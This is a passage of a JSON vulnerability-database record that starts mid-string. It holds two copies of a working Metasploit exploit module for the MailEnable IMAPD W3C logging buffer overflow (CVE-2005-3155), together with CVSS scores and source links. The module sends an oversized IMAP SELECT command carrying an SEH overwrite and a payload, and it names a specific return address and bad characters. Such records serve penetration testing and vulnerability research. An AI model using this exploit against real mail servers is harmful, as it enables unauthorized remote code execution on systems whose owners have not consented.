and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Imap\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in the W3C logging\r\n\t\t\t\tfunctionality of the MailEnable IMAPD service. Logging is\r\n\t\t\t\tnot enabled by default and this exploit requires a valid\r\n\t\t\t\tusername and password to exploit the flaw. 
MailEnable\r\n\t\t\t\tProfessional version 1.6 and prior and MailEnable Enterprise\r\n\t\t\t\tversion 1.1 and prior are affected.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9525 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2005-3155'],\r\n\t\t\t\t\t[ 'OSVDB', '19842'],\r\n\t\t\t\t\t[ 'BID', '15006'],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 600,\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Oct 03 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tdisconnect\r\n\r\n\t\tif (banner and banner =~ /MailEnable Service, Version: 0-1\\.54/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect_login\r\n\r\n\t\tbuf = rand_text_alphanumeric(6196, payload_badchars)\r\n\t\tseh = generate_seh_payload(target.ret)\r\n\t\treq = 'a01 SELECT ' + buf + seh + \"\\r\\n\"\r\n\t\tsock.put(req)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16480/"}], "metasploit": [{"lastseen": "2019-02-15T16:56:41", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow in the W3C logging functionality of the MailEnable IMAPD service. Logging is not enabled by default and this exploit requires a valid username and password to exploit the flaw. 
MailEnable Professional version 1.6 and prior and MailEnable Enterprise version 1.1 and prior are affected.", "modified": "2017-07-24T13:26:21", "published": "2005-12-05T05:00:27", "id": "MSF:EXPLOIT/WINDOWS/IMAP/MAILENABLE_W3C_SELECT", "href": "", "type": "metasploit", "title": "MailEnable IMAPD W3C Logging Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Imap\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow in the W3C logging\n functionality of the MailEnable IMAPD service. Logging is\n not enabled by default and this exploit requires a valid\n username and password to exploit the flaw. MailEnable\n Professional version 1.6 and prior and MailEnable Enterprise\n version 1.1 and prior are affected.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-3155'],\n [ 'OSVDB', '19842'],\n [ 'BID', '15006'],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 600,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['MailEnable 1.54 Pro Universal', { 'Ret' => 0x1001c019 } ] #MEAISP.DLL\n ],\n 'DisclosureDate' => 'Oct 03 2005',\n 'DefaultTarget' => 0))\n end\n\n def check\n connect\n disconnect\n\n if (banner and banner =~ /MailEnable Service, Version: 0-1\\.54/)\n return Exploit::CheckCode::Appears\n end\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect_login\n\n buf = rand_text_alphanumeric(6196, payload_badchars)\n seh = generate_seh_payload(target.ret)\n req = 'a01 SELECT ' + buf + seh + 
\"\\r\\n\"\n sock.put(req)\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/imap/mailenable_w3c_select.rb"}]}